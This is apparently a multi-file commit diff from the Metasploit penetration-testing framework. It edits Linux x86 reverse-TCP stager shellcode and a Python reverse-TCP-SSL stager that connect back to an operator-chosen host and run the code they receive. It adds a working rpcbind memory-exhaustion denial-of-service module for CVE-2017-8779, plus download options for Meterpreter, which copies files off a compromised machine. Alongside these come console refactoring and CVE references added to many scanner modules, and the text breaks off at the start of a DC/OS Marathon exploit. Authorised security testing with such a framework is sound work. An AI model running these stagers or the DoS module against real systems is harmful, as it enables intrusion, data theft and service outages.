elog("NTDS Parser: Error pulling batch - #{e}")
raw_batch_data = nil
end
raw_batch_data

85
lib/msf/core/payload/linux/reverse_tcp.rb
View File

@ -91,49 +91,61 @@ module Payload::Linux::ReverseTcp
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
asm = %Q^
xor ebx, ebx
mul ebx
push ebx
inc ebx
push ebx
push 0x2
mov al, 0x66
mov ecx, esp
int 0x80 ; sys_socketcall (socket())
xor ebx, ebx
mul ebx
push ebx
inc ebx
push ebx
push 0x2
mov al, 0x66
mov ecx, esp
int 0x80 ; sys_socketcall (socket())
test eax, eax
js failed
xchg eax, edi ; store the socket in edi
pop ebx ; set ebx back to zero
push #{encoded_host}
push #{encoded_port}
mov ecx, esp
push 0x66
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
int 0x80 ; sys_socketcall (connect())
xchg eax, edi ; store the socket in edi
pop ebx ; set ebx back to zero
push #{encoded_host}
push #{encoded_port}
mov ecx, esp
push 0x66
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
int 0x80 ; sys_socketcall (connect())
test eax, eax
js failed
^
asm << asm_send_uuid if include_send_uuid
asm << %Q^
mov dl, 0x7
mov ecx, 0x1000
mov ebx, esp
shr ebx, 0xc
shl ebx, 0xc
mov al, 0x7d
int 0x80 ; sys_mprotect
mov dl, 0x7
mov ecx, 0x1000
mov ebx, esp
shr ebx, 0xc
shl ebx, 0xc
mov al, 0x7d
int 0x80 ; sys_mprotect
test eax, eax
js failed
pop ebx
mov ecx, esp
cdq
mov dh, 0xc
mov al, 0x3
int 0x80 ; sys_read (recv())
jmp ecx
pop ebx
mov ecx, esp
cdq
mov dh, 0xc
mov al, 0x3
int 0x80 ; sys_read (recv())
test eax, eax
js failed
jmp ecx
failed:
mov eax, 0x1
mov ebx, 0x1 ; set exit status to 1
int 0x80 ; sys_exit
^
asm
@ -142,4 +154,3 @@ module Payload::Linux::ReverseTcp
end
end

2
lib/msf/core/payload/python/reverse_tcp.rb
View File

@ -32,7 +32,7 @@ module Payload::Python::ReverseTcp
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['StagerRetryCount'],
retry_wait: datastore['StagerRetryWait'],
retry_wait: datastore['StagerRetryWait']
}
generate_reverse_tcp(conf)

38
lib/msf/core/payload/python/reverse_tcp_ssl.rb
View File

@ -15,6 +15,13 @@ module Payload::Python::ReverseTcpSsl
include Msf::Payload::Python
include Msf::Payload::Python::ReverseTcp
def initialize(*args)
super
register_advanced_options([
OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]),
OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5])
], self.class)
end
#
# Generate the first stage
@ -22,7 +29,9 @@ module Payload::Python::ReverseTcpSsl
def generate
conf = {
port: datastore['LPORT'],
host: datastore['LHOST']
host: datastore['LHOST'],
retry_count: datastore['StagerRetryCount'],
retry_wait: datastore['StagerRetryWait']
}
generate_reverse_tcp_ssl(conf)
@ -42,10 +51,29 @@ module Payload::Python::ReverseTcpSsl
def generate_reverse_tcp_ssl(opts={})
# Set up the socket
cmd = "import ssl,socket,struct\n"
cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "s=ssl.wrap_socket(so)\n"
cmd = "import ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
if opts[:retry_wait].blank? # do not retry at all (old style)
cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "s=ssl.wrap_socket(so)\n"
else
if opts[:retry_count] > 0
cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
else
cmd << "while 1:\n"
end
cmd << "\ttry:\n"
cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
cmd << "\t\ts=ssl.wrap_socket(so)\n"
cmd << "\t\tbreak\n"
cmd << "\texcept:\n"
if opts[:retry_wait].to_i <= 0
cmd << "\t\tpass\n" # retry immediately
else
cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
end
end
cmd << py_send_uuid if include_send_uuid
cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
cmd << "d=s.recv(l)\n"

2
lib/msf/ui/console/command_dispatcher.rb
View File

@ -1,5 +1,5 @@
# -*- coding: binary -*-
require 'msf/ui/console/command_dispatcher/common'
module Msf
module Ui
module Console

147
lib/msf/ui/console/command_dispatcher/common.rb Normal file
View File

@ -0,0 +1,147 @@
# -*- coding: binary -*-
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
module Msf
module Ui
module Console
module CommandDispatcher
# These are functions that are used in two or more command dispatchers.
module Common
# Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
#
# @note This modifies +host_ranges+ in place
#
# @param arg [String] The thing to turn into a RangeWalker
# @param host_ranges [Array] The array of ranges to append
# @param required [Boolean] Whether an empty +arg+ should be an error
# @return [Boolean] true if parsing was successful or false otherwise
def arg_host_range(arg, host_ranges, required=false)
if (!arg and required)
print_error("Missing required host argument")
return false
end
begin
rw = Rex::Socket::RangeWalker.new(arg)
rescue
print_error("Invalid host parameter, #{arg}.")
return false
end
if rw.valid?
host_ranges << rw
else
print_error("Invalid host parameter, #{arg}.")
return false
end
return true
end
#
# Parse +arg+ into an array of ports and append the result into +port_ranges+
#
# Returns true if parsing was successful or nil otherwise.
#
# NOTE: This modifies +port_ranges+
#
def arg_port_range(arg, port_ranges, required=false)
if (!arg and required)
print_error("Argument required for -p")
return
end
begin
port_ranges << Rex::Socket.portspec_to_portlist(arg)
rescue
print_error("Invalid port parameter, #{arg}.")
return
end
return true
end
#
# Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses
#
# This stores all the addresses to a temporary file and utilizes the
# <pre>file:/tmp/filename</pre> syntax to confer the addrs. +rhosts+
# should be an Array. NOTE: the temporary file is *not* deleted
# automatically.
#
def set_rhosts_from_addrs(rhosts)
if rhosts.empty?
print_status("The list is empty, cowardly refusing to set RHOSTS")
return
end
if active_module
mydatastore = active_module.datastore
else
# if there is no module in use set the list to the global variable
mydatastore = self.framework.datastore
end
if rhosts.length > 5
# Lots of hosts makes 'show options' wrap which is difficult to
# read, store to a temp file
rhosts_file = Rex::Quickfile.new("msf-db-rhosts-")
mydatastore['RHOSTS'] = 'file:'+rhosts_file.path
# create the output file and assign it to the RHOSTS variable
rhosts_file.write(rhosts.join("\n")+"\n")
rhosts_file.close
else
# For short lists, just set it directly
mydatastore['RHOSTS'] = rhosts.join(" ")
end
print_line "RHOSTS => #{mydatastore['RHOSTS']}"
print_line
end
def show_options(mod) # :nodoc:
mod_opt = Serializer::ReadableText.dump_options(mod, ' ')
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
# If it's an exploit and a payload is defined, create it and
# display the payload's options
if (mod.exploit? and mod.datastore['PAYLOAD'])
p = framework.payloads.create(mod.datastore['PAYLOAD'])
if (!p)
print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n")
return
end
p.share_datastore(mod.datastore)
if (p)
p_opt = Serializer::ReadableText.dump_options(p, ' ')
print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
end
end
# Print the selected target
if (mod.exploit? and mod.target)
mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ')
print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0)
end
# Print the selected action
if mod.kind_of?(Msf::Module::HasActions) && mod.action
mod_action = Serializer::ReadableText.dump_module_action(mod, ' ')
print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0)
end
# Uncomment this line if u want target like msf2 format
#print("\nTarget: #{mod.target.name}\n\n")
end
end
end
end
end
end

36
lib/msf/ui/console/command_dispatcher/creds.rb
View File

@ -3,7 +3,6 @@
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
require 'msf/ui/console/command_dispatcher/db_common'
module Msf
module Ui
@ -15,7 +14,7 @@ class Creds
include Msf::Ui::Console::CommandDispatcher
include Metasploit::Credential::Creation
include Msf::Ui::Console::CommandDispatcher::DbCommon
include Msf::Ui::Console::CommandDispatcher::Common
#
# The dispatcher's name.
@ -53,39 +52,6 @@ class Creds
true
end
#
# Miscellaneous option helpers
#
# Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
#
# @note This modifies +host_ranges+ in place
#
# @param arg [String] The thing to turn into a RangeWalker
# @param host_ranges [Array] The array of ranges to append
# @param required [Boolean] Whether an empty +arg+ should be an error
# @return [Boolean] true if parsing was successful or false otherwise
def arg_host_range(arg, host_ranges, required=false)
if (!arg and required)
print_error("Missing required host argument")
return false
end
begin
rw = Rex::Socket::RangeWalker.new(arg)
rescue
print_error("Invalid host parameter, #{arg}.")
return false
end
if rw.valid?
host_ranges << rw
else
print_error("Invalid host parameter, #{arg}.")
return false
end
return true
end
#
# Can return return active or all, on a certain host or range, on a
# certain port or range, and/or on a service name.

52
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -3,7 +3,6 @@
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
require 'msf/ui/console/command_dispatcher/db_common'
module Msf
module Ui
@ -15,7 +14,7 @@ class Db
require 'tempfile'
include Msf::Ui::Console::CommandDispatcher
include Msf::Ui::Console::CommandDispatcher::DbCommon
include Msf::Ui::Console::CommandDispatcher::Common
#
# The dispatcher's name.
@ -1809,55 +1808,6 @@ class Db
# Miscellaneous option helpers
#
# Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
#
# @note This modifies +host_ranges+ in place
#
# @param arg [String] The thing to turn into a RangeWalker
# @param host_ranges [Array] The array of ranges to append
# @param required [Boolean] Whether an empty +arg+ should be an error
# @return [Boolean] true if parsing was successful or false otherwise
def arg_host_range(arg, host_ranges, required=false)
if (!arg and required)
print_error("Missing required host argument")
return false
end
begin
rw = Rex::Socket::RangeWalker.new(arg)
rescue
print_error("Invalid host parameter, #{arg}.")
return false
end
if rw.valid?
host_ranges << rw
else
print_error("Invalid host parameter, #{arg}.")
return false
end
return true
end
#
# Parse +arg+ into an array of ports and append the result into +port_ranges+
#
# Returns true if parsing was successful or nil otherwise.
#
# NOTE: This modifies +port_ranges+
#
def arg_port_range(arg, port_ranges, required=false)
if (!arg and required)
print_error("Argument required for -p")
return
end
begin
port_ranges << Rex::Socket.portspec_to_portlist(arg)
rescue
print_error("Invalid port parameter, #{arg}.")
return
end
return true
end
#
# Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into

57
lib/msf/ui/console/command_dispatcher/db_common.rb
View File

@ -1,57 +0,0 @@
# -*- coding: binary -*-
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
module Msf
module Ui
module Console
module CommandDispatcher
module DbCommon
#
# Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses
#
# This stores all the addresses to a temporary file and utilizes the
# <pre>file:/tmp/filename</pre> syntax to confer the addrs. +rhosts+
# should be an Array. NOTE: the temporary file is *not* deleted
# automatically.
#
def set_rhosts_from_addrs(rhosts)
if rhosts.empty?
print_status("The list is empty, cowardly refusing to set RHOSTS")
return
end
if active_module
mydatastore = active_module.datastore
else
# if there is no module in use set the list to the global variable
mydatastore = self.framework.datastore
end
if rhosts.length > 5
# Lots of hosts makes 'show options' wrap which is difficult to
# read, store to a temp file
rhosts_file = Rex::Quickfile.new("msf-db-rhosts-")
mydatastore['RHOSTS'] = 'file:'+rhosts_file.path
# create the output file and assign it to the RHOSTS variable
rhosts_file.write(rhosts.join("\n")+"\n")
rhosts_file.close
else
# For short lists, just set it directly
mydatastore['RHOSTS'] = rhosts.join(" ")
end
print_line "RHOSTS => #{mydatastore['RHOSTS']}"
print_line
end
end
end
end
end
end

3
lib/msf/ui/console/command_dispatcher/jobs.rb
View File

@ -16,6 +16,7 @@ module Msf
#
class Jobs
include Msf::Ui::Console::CommandDispatcher
include Msf::Ui::Console::CommandDispatcher::Common
@@handler_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner"],
@ -164,7 +165,7 @@ module Msf
job = framework.jobs[job_id.to_s]
mod = job.ctx[0]
output = '\n'
output = "\n"
output += "Name: #{mod.name}"
output += ", started at #{job.start_time}" if job.start_time
print_line(output)

39
lib/msf/ui/console/command_dispatcher/modules.rb
View File

@ -13,6 +13,7 @@ module Msf
class Modules
include Msf::Ui::Console::CommandDispatcher
include Msf::Ui::Console::CommandDispatcher::Common
# Constant for a retry timeout on using modules before they're loaded
CMD_USE_TIMEOUT = 3
@ -997,44 +998,6 @@ module Msf
show_module_set("Post", framework.post, regex, minrank, opts)
end
def show_options(mod) # :nodoc:
mod_opt = Serializer::ReadableText.dump_options(mod, ' ')
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
# If it's an exploit and a payload is defined, create it and
# display the payload's options
if (mod.exploit? and mod.datastore['PAYLOAD'])
p = framework.payloads.create(mod.datastore['PAYLOAD'])
if (!p)
print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n")
return
end
p.share_datastore(mod.datastore)
if (p)
p_opt = Serializer::ReadableText.dump_options(p, ' ')
print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
end
end
# Print the selected target
if (mod.exploit? and mod.target)
mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ')
print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0)
end
# Print the selected action
if mod.kind_of?(Msf::Module::HasActions) && mod.action
mod_action = Serializer::ReadableText.dump_module_action(mod, ' ')
print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0)
end
# Uncomment this line if u want target like msf2 format
#print("\nTarget: #{mod.target.name}\n\n")
end
def show_missing(mod) # :nodoc:
mod_opt = Serializer::ReadableText.dump_options(mod, ' ', true)
print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)

42
lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
View File

@ -7,6 +7,7 @@ require 'rex/post/meterpreter/extensions/stdapi/stdapi'
require 'rex/post/meterpreter/extensions/stdapi/fs/io'
require 'rex/post/meterpreter/extensions/stdapi/fs/file_stat'
require 'fileutils'
require 'filesize'
module Rex
module Post
@ -25,6 +26,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
include Rex::Post::File
MIN_BLOCK_SIZE = 1024
class << self
attr_accessor :client
end
@ -312,7 +315,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
dest += timestamp
end
stat.call('downloading', src, dest) if (stat)
stat.call('Downloading', src, dest) if (stat)
result = download_file(dest, src, opts, &stat)
stat.call(result, src, dest) if (stat)
}
@ -325,8 +328,11 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
continue=false
tries=false
tries_no=0
stat ||= lambda { |a,b,c| }
if opts
continue = true if opts["continue"]
adaptive = true if opts['adaptive']
tries = true if opts["tries"]
tries_no = opts["tries_no"]
end
@ -346,6 +352,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
dir = ::File.dirname(dest_file)
::FileUtils.mkdir_p(dir) if dir and not ::File.directory?(dir)
src_size = Filesize.new(src_stat.size).pretty
if continue
# continue downloading the file - skip downloaded part in the source
dst_fd = ::File.new(dest_file, "ab")
@ -353,10 +361,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
dst_fd.seek(0, ::IO::SEEK_END)
in_pos = dst_fd.pos
src_fd.seek(in_pos)
stat.call('continuing from ', in_pos, src_file) if (stat)
stat.call("Continuing from #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file)
rescue
# if we can't seek, download again
stat.call('error continuing - downloading from scratch', src_file, dest_file) if (stat)
stat.call('Error continuing - downloading from scratch', src_file, dest_file)
dst_fd.close
dst_fd = ::File.new(dest_file, "wb")
end
@ -365,10 +373,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end
# Keep transferring until EOF is reached...
block_size = opts['block_size'] || 1024 * 1024
begin
if tries
# resume when timeouts encountered
seek_back = false
adjust_block = false
tries_cnt = 0
begin # while
begin # exception
@ -376,30 +386,46 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
in_pos = dst_fd.pos
src_fd.seek(in_pos)
seek_back = false
stat.call('resuming at ', in_pos, src_file) if (stat)
stat.call("Resuming at #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file)
else
# succesfully read and wrote - reset the counter
tries_cnt = 0
end
data = src_fd.read
adjust_block = true
data = src_fd.read(block_size)
adjust_block = false
rescue Rex::TimeoutError
# timeout encountered - either seek back and retry or quit
if (tries && (tries_no == 0 || tries_cnt < tries_no))
tries_cnt += 1
seek_back = true
stat.call('error downloading - retry #', tries_cnt, src_file) if (stat)
# try a smaller block size for the next round
if adaptive && adjust_block
block_size = [block_size >> 1, MIN_BLOCK_SIZE].max
adjust_block = false
msg = "Error downloading, block size set to #{block_size} - retry # #{tries_cnt}"
stat.call(msg, src_file, dest_file)
else
stat.call("Error downloading - retry # #{tries_cnt}", src_file, dest_file)
end
retry
else
stat.call('error downloading - giving up', src_file, dest_file) if (stat)
stat.call('Error downloading - giving up', src_file, dest_file)
raise
end
end
dst_fd.write(data) if (data != nil)
percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0
msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)"
stat.call(msg, src_file, dest_file)
end while (data != nil)
else
# do the simple copying quiting on the first error
while ((data = src_fd.read) != nil)
while ((data = src_fd.read(block_size)) != nil)
dst_fd.write(data)
percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0
msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)"
stat.call(msg, src_file, dest_file)
end
end
rescue EOFError

6
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
View File

@ -28,6 +28,8 @@ class Console::CommandDispatcher::Stdapi::Fs
@@download_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ],
"-c" => [ false, "Resume getting a partially-downloaded file." ],
"-a" => [ false, "Enable adaptive download buffer size." ],
"-b" => [ true, "Set the initial block size for the download." ],
"-l" => [ true, "Set the limit of retries (0 unlimits)." ],
"-r" => [ false, "Download recursively." ],
"-t" => [ false, "Timestamp downloaded files." ])
@ -382,6 +384,10 @@ class Console::CommandDispatcher::Stdapi::Fs
@@download_opts.parse(args) { |opt, idx, val|
case opt
when "-a"
opts['adaptive'] = true
when "-b"
opts['block_size'] = val.to_i
when "-r"
recursive = true
opts['recursive'] = true

74
modules/auxiliary/dos/rpc/rpcbomb.rb Normal file
View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
def initialize(info={})
super(update_info(info,
'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
'Description' => %q{
This module exploits a vulnerability in certain versions of
rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
large (and never freed) memory allocations for XDR strings on
the target.
},
'Author' =>
[
'guidovranken', # original code
'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2017-8779' ],
[ 'BID', '98325' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
],
'Disclosure Date' => 'May 03 2017'))
register_options([
Opt::RPORT(111),
OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
])
end
def scan_host(ip)
pkt = [
0, # xid
0, # message type CALL
2, # RPC version 2
100000, # Program
4, # Program version
9, # Procedure
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Program: 0
0, # Ver
4, # Proc
4, # Argument length
datastore['ALLOCSIZE'] # Payload
].pack('N*')
s = udp_socket(ip, datastore['RPORT'])
count = 0
while count < datastore['COUNT'] do
begin
s.send(pkt, 0)
rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
vprint_error("Host #{ip} unreachable")
break
end
count += 1
end
vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
end
end

9
modules/auxiliary/scanner/dns/dns_amp.rb
View File

@ -19,7 +19,12 @@ class MetasploitModule < Msf::Auxiliary
third party.
},
'Author' => [ 'xistence <xistence[at]0x90.nl>'], # Original scanner module
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-0987'],
['CVE', '2006-0988'],
]
)
register_options( [
@ -124,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
:port => datastore['RPORT'],
:proto => 'udp', :name => "DNS",
:info => "DNS amplification - #{data.length} bytes [#{amp.round(2)}x Amplification]",
:refs => [ "CVE-2006-0987", "CVE-2006-0988" ])
:refs => self.references)
end
# If these flags are set, we get a valid response but recursion is not available

1
modules/auxiliary/scanner/http/host_header_injection.rb
View File

@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-10073'], # validate, an instance of a described attack approach from the original reference
['URL', 'http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html']
]
))

2
modules/auxiliary/scanner/http/jenkins_command.rb
View File

@ -26,6 +26,8 @@ class MetasploitModule < Msf::Auxiliary
],
'References' =>
[
['CVE', '2015-8103'], # see link and validate, https://highon.coffee/blog/jenkins-api-unauthenticated-rce-exploit/ states this is another issue
['URL', 'https://jenkins.io/security/advisory/2015-11-11/'],
['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'],
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'],
],

7
modules/auxiliary/scanner/http/trace.rb
View File

@ -20,7 +20,12 @@ class MetasploitModule < Msf::Auxiliary
'Jay Turla <@shipcod3>' , #Cross-Site Tracing (XST) Checker
'CG' #HTTP TRACE Detection
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2005-3398'], # early case where this vector applied to a specific application.
['URL', 'https://www.owasp.org/index.php/Cross_Site_Tracing']
]
)
end

1
modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
View File

@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4782'],
['URL', 'http://fish2.com/ipmi/cipherzero.html'],
['OSVDB', '93038'],
['OSVDB', '93039'],

1
modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb
View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0659' ],
[ 'OSVDB', '101653' ],
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
],

1
modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

1
modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

1
modules/auxiliary/scanner/ntp/ntp_readvar.rb
View File

@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
[ 'URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ]
]
)

1
modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
View File

@ -25,6 +25,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

1
modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
View File

@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

1
modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

1
modules/auxiliary/scanner/oracle/tnspoison_checker.rb
View File

@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]
'References' =>
[
[ 'CVE', '2012-1675'],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ],
],
'DisclosureDate' => 'Apr 18 2012',

1
modules/auxiliary/scanner/portmap/portmap_amp.rb
View File

@ -20,6 +20,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'],
['URL', 'http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/']
],

1
modules/auxiliary/scanner/scada/moxa_discover.rb
View File

@ -35,6 +35,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-9361'],
[ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],
[ 'URL', 'http://www.moxa.com/support/faq/faq_detail.aspx?id=646' ],
]

1
modules/auxiliary/scanner/udp/udp_amplification.rb
View File

@ -16,6 +16,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A']
]
)

7
modules/auxiliary/scanner/udp_scanner_template.rb
View File

@ -21,7 +21,12 @@ class MetasploitModule < Msf::Auxiliary
),
'Author' => 'Joe Contributor <joe_contributor[at]example.com>',
'DisclosureDate' => 'Mar 15 2014',
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '0000-0000'], # remove or update if CVE exists
['URL', 'https://SomeURLinCyberspace.local']
]
)
)

1
modules/auxiliary/scanner/upnp/ssdp_amp.rb
View File

@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A']
],
)

9
modules/auxiliary/scanner/upnp/ssdp_msearch.rb
View File

@ -13,7 +13,14 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'UPnP SSDP M-SEARCH Information Discovery',
'Description' => 'Discover information from UPnP-enabled systems',
'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5958'],
['CVE', '2012-5959'],
['CVE', '2013-0230'],
['CVE', '2013-0229']
]
)
register_options( [

1
modules/auxiliary/scanner/vnc/vnc_none_auth.rb
View File

@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary
'Description' => 'Detect VNC servers that support the "None" authentication method.',
'References' =>
[
['CVE', '2006-2369'], # a related instance where "None" could be offered and used when not configured as allowed.
['URL', 'http://en.wikipedia.org/wiki/RFB'],
['URL', 'http://en.wikipedia.org/wiki/Vnc'],
],

195
modules/exploits/linux/http/dcos_marathon.rb Normal file
View File

@ -0,0 +1,195 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
